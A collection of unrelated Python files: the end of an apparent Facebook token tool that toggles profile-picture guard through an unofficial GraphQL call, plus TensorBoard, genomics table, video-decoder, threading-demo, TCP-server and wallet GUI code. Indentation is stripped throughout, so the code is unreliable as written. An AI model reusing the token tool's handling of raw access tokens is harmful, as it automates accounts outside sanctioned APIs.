except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def guard():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Enable'
print '║-> \x1b[1;37;40m2. Disable'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
g = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if g == '1':
aktif = 'true'
gaz(toket, aktif)
else:
if g == '2':
non = 'false'
gaz(toket, non)
else:
if g == '0':
lain()
else:
if g == '':
keluar()
else:
keluar()
def get_userid(toket):
url = 'https://graph.facebook.com/me?access_token=%s' % toket
res = requests.get(url)
uid = json.loads(res.text)
return uid['id']
def gaz(toket, enable=True):
id = get_userid(toket)
data = 'variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutation' % (enable, str(id))
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Authorization': 'OAuth %s' % toket}
url = 'https://graph.facebook.com/graphql'
res = requests.post(url, data=data, headers=headers)
print res.text
if '"is_shielded":true' in res.text:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mActivated'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
if '"is_shielded":false' in res.text:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;91mDeactivated'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
print '\x1b[1;91m[!] Error'
keluar()
if __name__ == '__main__':
login()
|
tensorboard.py
|
import os
import time
from io import BufferedReader
from pathlib import Path
from queue import Queue, Empty
from subprocess import Popen, PIPE
from threading import Thread
from typing import List, Optional
from labml.logger import Text
from labml import logger
from labml.internal.experiment.experiment_run import RunInfo
from labml.internal.util import rm_tree
def enqueue_output(out: BufferedReader, queue: Queue):
for line in iter(out.readline, b''):
queue.put(line.decode('utf-8'))
out.close()
def get_output(out: BufferedReader):
q = Queue()
thread = Thread(target=enqueue_output, args=(out, q))
thread.daemon = True # thread dies with the program
thread.start()
lines = []
while True:
try:
line = q.get(timeout=30 if len(lines) == 0 else 2)
except Empty:
break
else:
lines.append(line)
return lines
class TensorBoardStarter:
pipe: Optional[Popen]
def __init__(self, symlink_path: Path,
port: int = 6006, visible_port: int = 6006,
protocol: str = 'http', host: str = 'localhost'):
self.visible_port = visible_port
self.host = host
self.protocol = protocol
self.port = port
self.symlink_path = symlink_path
self.pipe = None
@property
def url(self):
return f'{self.protocol}://{self.host}:{self.visible_port}/'
def _create_symlink_folder(self):
if self.symlink_path.exists():
rm_tree(self.symlink_path)
self.symlink_path.mkdir(parents=True)
def start(self, runs: List[Path]):
if self.pipe is not None:
self.pipe.kill()
self._create_symlink_folder()
for p in runs:
run = RunInfo.from_path(p)
os.symlink(run.tensorboard_log_path, self.symlink_path / run.uuid)
self.pipe = Popen(['tensorboard',
f'--logdir={self.symlink_path}',
'--port', f'{self.port}',
'--bind_all'],
env=os.environ.copy(),
stderr=PIPE)
output = ''.join(get_output(self.pipe.stderr))
if output.find('Press CTRL+C to quit') != -1:
logger.log([('Tensorboard: ', Text.meta), (output, Text.subtle)])
return True, output
else:
logger.log([('Failed to start Tensorboard: ', Text.warning), (output, Text.subtle)])
return False, output
def __del__(self):
if self.pipe is not None:
self.pipe.kill()
def _test():
from labml.internal.computer.configs import computer_singleton
from labml import lab
from labml.internal.lab import lab_singleton
import time
lab_singleton().set_path(str(Path(os.path.abspath(__file__)).parent.parent.parent.parent))
tb = TensorBoardStarter(computer_singleton().tensorboard_symlink_dir)
# for k, v in os.environ.items():
# print(k, v)
res = tb.start([
lab.get_path() / 'logs' / 'sample' / '68233e98cb5311eb9aa38d17b08f3a1d',
])
print(res)
time.sleep(100)
if __name__ == '__main__':
_test()
|
vsnp_build_tables.py
|
#!/usr/bin/env python
import argparse
import multiprocessing
import os
import queue
import re
import pandas
import pandas.io.formats.excel
from Bio import SeqIO
INPUT_JSON_AVG_MQ_DIR = 'input_json_avg_mq_dir'
INPUT_JSON_DIR = 'input_json_dir'
INPUT_NEWICK_DIR = 'input_newick_dir'
# Maximum columns allowed in a LibreOffice
# spreadsheet is 1024. Excel allows for
# 16,384 columns, but we'll set the lower
# number as the maximum. Some browsers
# (e.g., Firefox on Linux) are configured
# to use LibreOffice for Excel spreadsheets.
MAXCOLS = 1024
OUTPUT_EXCEL_DIR = 'output_excel_dir'
def annotate_table(table_df, group, annotation_dict):
for gbk_chrome, pro in list(annotation_dict.items()):
ref_pos = list(table_df)
ref_series = pandas.Series(ref_pos)
ref_df = pandas.DataFrame(ref_series.str.split(':', expand=True).values, columns=['reference', 'position'])
all_ref = ref_df[ref_df['reference'] == gbk_chrome]
positions = all_ref.position.to_frame()
# Create an annotation file.
annotation_file = "%s_annotations.csv" % group
with open(annotation_file, "a") as fh:
for _, row in positions.iterrows():
pos = row.position
try:
aaa = pro.iloc[pro.index.get_loc(int(pos))][['chrom', 'locus', 'product', 'gene']]
try:
chrom, name, locus, tag = aaa.values[0]
print("{}:{}\t{}, {}, {}".format(chrom, pos, locus, tag, name), file=fh)
except ValueError:
# If only one annotation for the entire
# chromosome (e.g., flu) then having [0] fails
chrom, name, locus, tag = aaa.values
print("{}:{}\t{}, {}, {}".format(chrom, pos, locus, tag, name), file=fh)
except KeyError:
print("{}:{}\tNo annotated product".format(gbk_chrome, pos), file=fh)
# Read the annotation file into a data frame.
annotations_df = pandas.read_csv(annotation_file, sep='\t', header=None, names=['index', 'annotations'], index_col='index')
# Remove the annotation_file from disk since both
# cascade and sort tables are built using the file,
# and it is opened for writing in append mode.
os.remove(annotation_file)
# Process the data.
table_df_transposed = table_df.T
table_df_transposed.index = table_df_transposed.index.rename('index')
table_df_transposed = table_df_transposed.merge(annotations_df, left_index=True, right_index=True)
table_df = table_df_transposed.T
return table_df
def excel_formatter(json_file_name, excel_file_name, group, annotation_dict):
pandas.io.formats.excel.header_style = None
table_df = pandas.read_json(json_file_name, orient='split')
if annotation_dict is not None:
table_df = annotate_table(table_df, group, annotation_dict)
else:
table_df = table_df.append(pandas.Series(name='no annotations'))
writer = pandas.ExcelWriter(excel_file_name, engine='xlsxwriter')
table_df.to_excel(writer, sheet_name='Sheet1')
writer_book = writer.book
ws = writer.sheets['Sheet1']
format_a = writer_book.add_format({'bg_color': '#58FA82'})
format_g = writer_book.add_format({'bg_color': '#F7FE2E'})
format_c = writer_book.add_format({'bg_color': '#0000FF'})
format_t = writer_book.add_format({'bg_color': '#FF0000'})
format_normal = writer_book.add_format({'bg_color': '#FDFEFE'})
formatlowqual = writer_book.add_format({'font_color': '#C70039', 'bg_color': '#E2CFDD'})
format_ambigous = writer_book.add_format({'font_color': '#C70039', 'bg_color': '#E2CFDD'})
format_n = writer_book.add_format({'bg_color': '#E2CFDD'})
rows, cols = table_df.shape
ws.set_column(0, 0, 30)
ws.set_column(1, cols, 2.1)
ws.freeze_panes(2, 1)
format_annotation = writer_book.add_format({'font_color': '#0A028C', 'rotation': '-90', 'align': 'top'})
# Set last row.
ws.set_row(rows + 1, cols + 1, format_annotation)
# Make sure that row/column locations don't overlap.
ws.conditional_format(rows - 2, 1, rows - 1, cols, {'type': 'cell', 'criteria': '<', 'value': 55, 'format': formatlowqual})
ws.conditional_format(2, 1, rows - 2, cols, {'type': 'cell', 'criteria': '==', 'value': 'B$2', 'format': format_normal})
ws.conditional_format(2, 1, rows - 2, cols, {'type': 'text', 'criteria': 'containing', 'value': 'A', 'format': format_a})
ws.conditional_format(2, 1, rows - 2, cols, {'type': 'text', 'criteria': 'containing', 'value': 'G', 'format': format_g})
ws.conditional_format(2, 1, rows - 2, cols, {'type': 'text', 'criteria': 'containing', 'value': 'C', 'format': format_c})
ws.conditional_format(2, 1, rows - 2, cols, {'type': 'text', 'criteria': 'containing', 'value': 'T', 'format': format_t})
ws.conditional_format(2, 1, rows - 2, cols, {'type': 'text', 'criteria': 'containing', 'value': 'S', 'format': format_ambigous})
ws.conditional_format(2, 1, rows - 2, cols, {'type': 'text', 'criteria': 'containing', 'value': 'Y', 'format': format_ambigous})
ws.conditional_format(2, 1, rows - 2, cols, {'type': 'text', 'criteria': 'containing', 'value': 'R', 'format': format_ambigous})
ws.conditional_format(2, 1, rows - 2, cols, {'type': 'text', 'criteria': 'containing', 'value': 'W', 'format': format_ambigous})
ws.conditional_format(2, 1, rows - 2, cols, {'type': 'text', 'criteria': 'containing', 'value': 'K', 'format': format_ambigous})
ws.conditional_format(2, 1, rows - 2, cols, {'type': 'text', 'criteria': 'containing', 'value': 'M', 'format': format_ambigous})
ws.conditional_format(2, 1, rows - 2, cols, {'type': 'text', 'criteria': 'containing', 'value': 'N', 'format': format_n})
ws.conditional_format(2, 1, rows - 2, cols, {'type': 'text', 'criteria': 'containing', 'value': '-', 'format': format_n})
format_rotation = writer_book.add_format({})
format_rotation.set_rotation(90)
for column_num, column_name in enumerate(list(table_df.columns)):
ws.write(0, column_num + 1, column_name, format_rotation)
format_annotation = writer_book.add_format({'font_color': '#0A028C', 'rotation': '-90', 'align': 'top'})
# Set last row.
ws.set_row(rows, 400, format_annotation)
writer.save()
def get_annotation_dict(gbk_file):
gbk_dict = SeqIO.to_dict(SeqIO.parse(gbk_file, "genbank"))
annotation_dict = {}
tmp_file = "features.csv"
# Create a file of chromosomes and features.
for chromosome in list(gbk_dict.keys()):
with open(tmp_file, 'w+') as fh:
for feature in gbk_dict[chromosome].features:
if "CDS" in feature.type or "rRNA" in feature.type:
try:
product = feature.qualifiers['product'][0]
except KeyError:
product = None
try:
locus = feature.qualifiers['locus_tag'][0]
except KeyError:
locus = None
try:
gene = feature.qualifiers['gene'][0]
except KeyError:
gene = None
fh.write("%s\t%d\t%d\t%s\t%s\t%s\n" % (chromosome, int(feature.location.start), int(feature.location.end), locus, product, gene))
# Read the chromosomes and features file into a data frame.
df = pandas.read_csv(tmp_file, sep='\t', names=["chrom", "start", "stop", "locus", "product", "gene"])
# Process the data.
df = df.sort_values(['start', 'gene'], ascending=[True, False])
df = df.drop_duplicates('start')
pro = df.reset_index(drop=True)
pro.index = pandas.IntervalIndex.from_arrays(pro['start'], pro['stop'], closed='both')
annotation_dict[chromosome] = pro
return annotation_dict
def get_base_file_name(file_path):
base_file_name = os.path.basename(file_path)
if base_file_name.find(".") > 0:
# Eliminate the extension.
return os.path.splitext(base_file_name)[0]
elif base_file_name.find("_") > 0:
# The dot extension was likely changed to
# the " character.
items = base_file_name.split("_")
return "_".join(items[0:-1])
else:
return base_file_name
def output_cascade_table(cascade_order, mqdf, group, annotation_dict):
cascade_order_mq = pandas.concat([cascade_order, mqdf], join='inner')
output_table(cascade_order_mq, "cascade", group, annotation_dict)
def output_excel(df, type_str, group, annotation_dict, count=None):
# Output the temporary json file that
# is used by the excel_formatter.
if count is None:
if group is None:
json_file_name = "%s_order_mq.json" % type_str
excel_file_name = os.path.join(OUTPUT_EXCEL_DIR, "%s_table.xlsx" % type_str)
else:
json_file_name = "%s_%s_order_mq.json" % (group, type_str)
excel_file_name = os.path.join(OUTPUT_EXCEL_DIR, "%s_%s_table.xlsx" % (group, type_str))
else:
if group is None:
json_file_name = "%s_order_mq_%d.json" % (type_str, count)
excel_file_name = os.path.join(OUTPUT_EXCEL_DIR, "%s_table_%d.xlsx" % (type_str, count))
else:
json_file_name = "%s_%s_order_mq_%d.json" % (group, type_str, count)
excel_file_name = os.path.join(OUTPUT_EXCEL_DIR, "%s_%s_table_%d.xlsx" % (group, type_str, count))
df.to_json(json_file_name, orient='split')
# Output the Excel file.
excel_formatter(json_file_name, excel_file_name, group, annotation_dict)
def output_sort_table(cascade_order, mqdf, group, annotation_dict):
sort_df = cascade_order.T
sort_df['abs_value'] = sort_df.index
sort_df[['chrom', 'pos']] = sort_df['abs_value'].str.split(':', expand=True)
sort_df = sort_df.drop(['abs_value', 'chrom'], axis=1)
sort_df.pos = sort_df.pos.astype(int)
sort_df = sort_df.sort_values(by=['pos'])
sort_df = sort_df.drop(['pos'], axis=1)
sort_df = sort_df.T
sort_order_mq = pandas.concat([sort_df, mqdf], join='inner')
output_table(sort_order_mq, "sort", group, annotation_dict)
def output_table(df, type_str, group, annotation_dict):
if isinstance(group, str) and group.startswith("dataset"):
# Inputs are single files, not collections,
# so input file names are not useful for naming
# output files.
group_str = None
else:
group_str = group
count = 0
chunk_start = 0
chunk_end = 0
column_count = df.shape[1]
if column_count >= MAXCOLS:
# Here the number of columns is greater than
# the maximum allowed by Excel, so multiple
# outputs will be produced.
while column_count >= MAXCOLS:
count += 1
chunk_end += MAXCOLS
df_of_type = df.iloc[:, chunk_start:chunk_end]
output_excel(df_of_type, type_str, group_str, annotation_dict, count=count)
chunk_start += MAXCOLS
column_count -= MAXCOLS
count += 1
df_of_type = df.iloc[:, chunk_start:]
output_excel(df_of_type, type_str, group_str, annotation_dict, count=count)
else:
output_excel(df, type_str, group_str, annotation_dict)
def preprocess_tables(task_queue, annotation_dict, timeout):
while True:
try:
tup = task_queue.get(block=True, timeout=timeout)
except queue.Empty:
break
newick_file, json_file, json_avg_mq_file = tup
avg_mq_series = pandas.read_json(json_avg_mq_file, typ='series', orient='split')
# Map quality to dataframe.
mqdf = avg_mq_series.to_frame(name='MQ')
mqdf = mqdf.T
# Get the group.
group = get_base_file_name(newick_file)
snps_df = pandas.read_json(json_file, orient='split')
with open(newick_file, 'r') as fh:
for line in fh:
line = re.sub('[:,]', '\n', line)
line = re.sub('[)(]', '', line)
line = re.sub(r'[0-9].*\.[0-9].*\n', '', line)
line = re.sub('root\n', '', line)
sample_order = line.split('\n')
sample_order = list([_f for _f in sample_order if _f])
sample_order.insert(0, 'root')
tree_order = snps_df.loc[sample_order]
# Count number of SNPs in each column.
snp_per_column = []
for column_header in tree_order:
count = 0
column = tree_order[column_header]
for element in column:
if element != column[0]:
count = count + 1
snp_per_column.append(count)
row1 = pandas.Series(snp_per_column, tree_order.columns, name="snp_per_column")
# Count number of SNPS from the
# top of each column in the table.
snp_from_top = []
for column_header in tree_order:
count = 0
column = tree_order[column_header]
# for each element in the column
# skip the first element
for element in column[1:]:
if element == column[0]:
count = count + 1
else:
break
snp_from_top.append(count)
row2 = pandas.Series(snp_from_top, tree_order.columns, name="snp_from_top")
tree_order = tree_order.append([row1])
tree_order = tree_order.append([row2])
# In pandas=0.18.1 even this does not work:
# abc = row1.to_frame()
# abc = abc.T --> tree_order.shape (5, 18), abc.shape (1, 18)
# tree_order.append(abc)
# Continue to get error: "*** ValueError: all the input arrays must have same number of dimensions"
tree_order = tree_order.T
tree_order = tree_order.sort_values(['snp_from_top', 'snp_per_column'], ascending=[True, False])
tree_order = tree_order.T
# Remove snp_per_column and snp_from_top rows.
cascade_order = tree_order[:-2]
# Output the cascade table.
output_cascade_table(cascade_order, mqdf, group, annotation_dict)
# Output the sorted table.
output_sort_table(cascade_order, mqdf, group, annotation_dict)
task_queue.task_done()
def set_num_cpus(num_files, processes):
num_cpus = int(multiprocessing.cpu_count())
if num_files < num_cpus and num_files < processes:
return num_files
if num_cpus < processes:
half_cpus = int(num_cpus / 2)
if num_files < half_cpus:
return num_files
return half_cpus
return processes
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--input_avg_mq_json', action='store', dest='input_avg_mq_json', required=False, default=None, help='Average MQ json file')
parser.add_argument('--input_newick', action='store', dest='input_newick', required=False, default=None, help='Newick file')
parser.add_argument('--input_snps_json', action='store', dest='input_snps_json', required=False, default=None, help='SNPs json file')
parser.add_argument('--gbk_file', action='store', dest='gbk_file', required=False, default=None, help='Optional gbk file'),
parser.add_argument('--processes', action='store', dest='processes', type=int, help='User-selected number of processes to use for job splitting')
args = parser.parse_args()
if args.gbk_file is not None:
# Create the annotation_dict for annotating
# the Excel tables.
annotation_dict = get_annotation_dict(args.gbk_file)
else:
annotation_dict = None
# The assumption here is that the list of files
# in both INPUT_NEWICK_DIR and INPUT_JSON_DIR are
# named such that they are properly matched if
# the directories contain more than 1 file (i.e.,
# hopefully the newick file names and json file names
# will be something like Mbovis-01D6_* so they can be
# sorted and properly associated with each other).
if args.input_newick is not None:
newick_files = [args.input_newick]
else:
newick_files = []
for file_name in sorted(os.listdir(INPUT_NEWICK_DIR)):
file_path = os.path.abspath(os.path.join(INPUT_NEWICK_DIR, file_name))
newick_files.append(file_path)
if args.input_snps_json is not None:
json_files = [args.input_snps_json]
else:
json_files = []
for file_name in sorted(os.listdir(INPUT_JSON_DIR)):
file_path = os.path.abspath(os.path.join(INPUT_JSON_DIR, file_name))
json_files.append(file_path)
if args.input_avg_mq_json is not None:
json_avg_mq_files = [args.input_avg_mq_json]
else:
json_avg_mq_files = []
for file_name in sorted(os.listdir(INPUT_JSON_AVG_MQ_DIR)):
file_path = os.path.abspath(os.path.join(INPUT_JSON_AVG_MQ_DIR, file_name))
json_avg_mq_files.append(file_path)
multiprocessing.set_start_method('spawn')
queue1 = multiprocessing.JoinableQueue()
queue2 = multiprocessing.JoinableQueue()
num_files = len(newick_files)
cpus = set_num_cpus(num_files, args.processes)
# Set a timeout for get()s in the queue.
timeout = 0.05
for i, newick_file in enumerate(newick_files):
json_file = json_files[i]
json_avg_mq_file = json_avg_mq_files[i]
queue1.put((newick_file, json_file, json_avg_mq_file))
# Complete the preprocess_tables task.
processes = [multiprocessing.Process(target=preprocess_tables, args=(queue1, annotation_dict, timeout, )) for _ in range(cpus)]
for p in processes:
p.start()
for p in processes:
p.join()
queue1.join()
if queue1.empty():
queue1.close()
queue1.join_thread()
|
h264decoder.py
|
# -*- coding: utf-8 -*-
# Copyright (c) 2013 Adrian Taylor
# Inspired by equivalent node.js code by Felix Geisendörfer
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import os
"""
H.264 video decoder for AR.Drone 2.0. Uses ffmpeg.
"""
import sys
from subprocess import PIPE, Popen
from threading import Thread
import time
import libardrone
import ctypes
import numpy as np
import sys
try:
from Queue import Queue, Empty
except ImportError:
from queue import Queue, Empty # python 3.x
ON_POSIX = 'posix' in sys.builtin_module_names
def enqueue_output(out, outfileobject, frame_size):
frame_size_bytes = frame_size[0] * frame_size[1] * 3
while True:
buffer_str = out.read(frame_size_bytes)
im = np.frombuffer(buffer_str, count=frame_size_bytes, dtype=np.uint8)
im = im.reshape((frame_size[0], frame_size[1], 3))
outfileobject.image_ready(im)
# Logic for making ffmpeg terminate on the death of this process
def set_death_signal(signal):
libc = ctypes.CDLL('libc.so.6')
PR_SET_DEATHSIG = 1
libc.prctl(PR_SET_DEATHSIG, signal)
def set_death_signal_int():
if sys.platform != 'darwin':
SIGINT = 2
SIGTERM = 15
set_death_signal(SIGINT)
"""
Usage: pass a listener, with a method 'data_ready' which will be called whenever there's output
from ffmpeg. This will be called in an arbitrary thread. You can later call H264ToPng.get_data_if_any to retrieve
said data.
You should then call write repeatedly to write some encoded H.264 data.
"""
class H264Decoder(object):
def __init__(self, outfileobject=None, frame_size=(360, 640)):
if outfileobject is not None:
if (H264Decoder.which('ffmpeg') is None):
raise Exception("You need to install ffmpeg to be able to run ardrone")
p = Popen(["nice", "-n", "15", "ffmpeg", "-i", "-", "-f", "sdl",
"-probesize", "2048", "-flags", "low_delay", "-f",
"rawvideo", "-pix_fmt", 'rgb24', "-"],
stdin=PIPE, stdout=PIPE, stderr=open('/dev/null', 'w'),
bufsize=0, preexec_fn=set_death_signal_int)
t = Thread(target=enqueue_output, args=(p.stdout, outfileobject, frame_size))
t.daemon = True # thread dies with the program
t.start()
else:
if (H264Decoder.which('ffplay') is None):
raise Exception("You need to install ffmpeg and ffplay to be able to run ardrone in debug mode")
p = Popen(["nice", "-n", "15", "ffplay", "-probesize", "2048",
"-flags", "low_delay", "-i", "-"],
stdin=PIPE, stdout=open('/dev/null', 'w'),
stderr=open('/dev/null', 'w'), bufsize=-1,
preexec_fn=set_death_signal_int)
self.writefd = p.stdin
def write(self, data):
self.writefd.write(data)
@staticmethod
def which(program):
def is_exe(fpath):
return os.path.isfile(fpath) and os.access(fpath, os.X_OK)
fpath, fname = os.path.split(program)
if fpath:
if is_exe(program):
return program
else:
for path in os.environ["PATH"].split(os.pathsep):
path = path.strip('"')
exe_file = os.path.join(path, program)
if is_exe(exe_file):
return exe_file
return None
|
abandoned_lock.py
|
#!/usr/bin/env python3
""" Three philosophers, thinking and eating sushi """
import threading
chopstick_a = threading.Lock()
chopstick_b = threading.Lock()
chopstick_c = threading.Lock()
sushi_count = 500
def philosopher(name, first_chopstick, second_chopstick):
global sushi_count
while sushi_count > 0: # eat sushi until it's all gone
first_chopstick.acquire()
second_chopstick.acquire()
if sushi_count > 0:
sushi_count -= 1
print(name, 'took a piece! Sushi remaining:', sushi_count)
second_chopstick.release()
first_chopstick.release()
if __name__ == '__main__':
threading.Thread(target=philosopher, args=('Barron', chopstick_a, chopstick_b)).start()
threading.Thread(target=philosopher, args=('Olivia', chopstick_b, chopstick_c)).start()
threading.Thread(target=philosopher, args=('Steve', chopstick_a, chopstick_c)).start()
|
terminate.py
|
import time
from threading import Thread, Event
def count(stop_event):
n = 0
while not stop_event.is_set():
n += 1
print(n)
time.sleep(1)
def other_work():
time.sleep(5)
raise RuntimeError
def main():
stop_event = Event()
t = Thread(target=count, args=(stop_event,))
try:
t.start()
other_work()
except Exception as e:
print("caught expection")
finally:
stop_event.set()
t.join()
if __name__ == "__main__":
main()
|
server.py
|
"""TCP Server module."""
import time
import socket
import select
import threading
from testplan.common.utils.timing import wait
class Server(object):
"""
A server that can send and receive messages over the session protocol.
Supports multiple connections.
:param host: The host address the server is bound to.
:type host: ``str``
:param port: The port the server is bound to.
:type port: ``str`` or ``int``
:param listen: Socket listen argument.
:type listen: ``int``
"""
def __init__(self, host='localhost', port=0, listen=1):
self._input_host = host
self._input_port = port
self._listen = listen
self._ip = None
self._port = None
self._listening = False
self._server = None
self._server_thread = None
self._lock = threading.Lock()
self._connection_by_fd = {}
self._fds = {}
self.active_connections = 0
self.accepted_connections = 0
@property
def host(self):
"""Input host provided."""
return self._input_host
@property
def ip(self):
"""IP retrieved from socket."""
return self._ip
@property
def port(self):
"""Port retrieved after binding."""
return self._port
@property
def socket(self):
"""
Returns the underlying ``socket`` object
"""
return self._server
def bind(self):
"""Bind to a socket."""
self._server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if self._input_port != 0:
self._server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._server.bind((self._input_host, self._input_port))
self._ip, self._port = self._server.getsockname()
def serve(self, loop_sleep=0.005, listening_timeout=5):
"""Start serving connections."""
self._server_thread = threading.Thread(
target=self._serving, kwargs=dict(loop_sleep=loop_sleep))
self._server_thread.daemon = True
self._server_thread.start()
wait(lambda: self._listening, listening_timeout, raise_on_timeout=True)
def _serving(self, loop_sleep=0.005):
"""Listen for new inbound connections."""
self._server.listen(self._listen)
self._listening = True
inputs = [self._server]
outputs = []
while self._listening:
readable, writable, exceptional = select.select(
inputs, outputs, inputs)
for sock in readable:
if sock is self._server:
# New connection
conn, client_addr = sock.accept()
inputs.append(conn)
self._connection_by_fd[conn.fileno()] = conn
self._fds[self.active_connections] = conn.fileno()
self.active_connections += 1
for sock in exceptional:
inputs.remove(sock)
sock.close()
time.sleep(loop_sleep)
self._remove_all_connections()
try:
self._server.shutdown(socket.SHUT_RDWR)
except:
pass
self._server.close()
def accept_connection(self, timeout=10, accept_connection_sleep=0.1):
"""
Accepts a connection in the order in which they were received.
Return the index of the connection, which can be used to send
and receive messages using that connection.
If no connection is already available or becomes available in the given
timeout, then the method returns -1.
:param timeout: Timeout to wait for receiving connection.
:type timeout: ``int``
:param accept_connection_sleep: Sleep time to retry accept connection.
:type accept_connection_sleep: ``float``
:return: Index of connection
:rtype: ``int``
"""
started = time.time()
while True:
if self.accepted_connections in self._fds:
self.accepted_connections += 1
return self.accepted_connections - 1
if time.time() > started + timeout:
return -1
time.sleep(accept_connection_sleep)
def receive(self, size=1024, conn_idx=None, timeout=30,
wait_full_size=True):
"""
Receive a message of given size (number of bytes) from the given
connection.
:param size: Number of bytes to receive
:type size: ``int``
:param conn_idx: Index of connection to receive from
:type conn_idx: ``int``
:param timeout: timeout in seconds
:type timeout: ``int``
:param wait_full_size: Wait until full size is received.
:type wait_full_size: ``bool``
:return: message received
:rtype: ``bytes``
"""
conn_idx = self._validate_connection_idx(conn_idx)
# Get file descriptor and details of connection
fdesc = self._fds[conn_idx]
connection = self._connection_by_fd[fdesc]
connection.settimeout(timeout)
if wait_full_size is False:
connection.settimeout(timeout)
msg = connection.recv(size)
connection.settimeout(0)
else:
with self._lock:
msg = b''
try:
while len(msg) < size:
new_msg = connection.recv(size - len(msg))
if not new_msg:
raise Exception('Socket connection broken')
msg += new_msg
except socket.error:
if timeout == 0:
raise socket.timeout()
raise
return msg
def send(self, msg, conn_idx=None, timeout=30):
"""
Send the given message through the given connection.
:param msg: message to be sent
:type msg: ``bytes``
:param conn_idx: Index of connection to send to
:type conn_idx: ``int``
:param timeout: Timeout in seconds for sending all bytes
:type timeout: ``int``
:return: Number of bytes sent
:rtype: ``int``
"""
conn_idx = self._validate_connection_idx(conn_idx)
connection = self._connection_by_fd[self._fds[conn_idx]]
connection.settimeout(timeout)
with self._lock:
connection.sendall(msg)
return len(msg)
def close(self):
"""Closes the server and listen thread."""
self._listening = False
# self._serving may be stuck in select.select
self._server_thread.join(timeout=0.1)
def _validate_connection_idx(self, conn_idx):
"""
Check if given connection index is valid.
If this is None, then the connection defaults to the one and only
existing active connection. If there are more active connections or the
initial connection is no longer valid this will fail.
:param conn_idx: Index of connection to send to
:type conn_idx: ``int``
:return: Connection index to send message to
:rtype: ``int``
"""
if conn_idx is None:
if self.accepted_connections > 1:
conn_idx = self.accepted_connections - 1
else:
conn_idx = 0
if self.accepted_connections == 0:
raise Exception('No connection accepted')
if conn_idx not in self._fds:
raise Exception('Connection {} not active'.format(conn_idx))
return conn_idx
def _remove_all_connections(self):
"""
Unregister, close and remove all existing connections
:return: ``None``
:rtype: ``NoneType``
"""
for fdesc in self._connection_by_fd:
self._connection_by_fd[fdesc].close()
self._connection_by_fd = {}
self._fds = {}
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import asyncio
from typing import TYPE_CHECKING, Optional, Union, Callable, Sequence
from electrum_firo.dash_ps_util import (PSPossibleDoubleSpendError,
PSSpendToPSAddressesError)
from electrum_firo.storage import WalletStorage, StorageReadWriteError
from electrum_firo.wallet_db import WalletDB
from electrum_firo.wallet import Wallet, InternalAddressCorruption, Abstract_Wallet
from electrum_firo.wallet import update_password_for_directory
from electrum_firo.plugin import run_hook
from electrum_firo import util
from electrum_firo.util import (profiler, InvalidPassword, send_exception_to_crash_reporter,
format_satoshis, format_satoshis_plain, format_fee_satoshis)
from electrum_firo.invoices import PR_PAID, PR_FAILED
from electrum_firo import blockchain
from electrum_firo.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum_firo.interface import PREFERRED_NETWORK_PROTOCOL, ServerAddr
from electrum_firo.logging import Logger
from electrum_firo.gui import messages
from .i18n import _
from . import KIVY_GUI_PATH
from kivy.app import App
from kivy.core.window import Window
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
from .uix.dialogs.password_dialog import OpenWalletDialog, ChangePasswordDialog, PincodeDialog, PasswordDialog
from .uix.dialogs.choice_dialog import ChoiceDialog
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum_firo.gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum_firo.gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum_firo.gui.kivy.uix.dialogs')
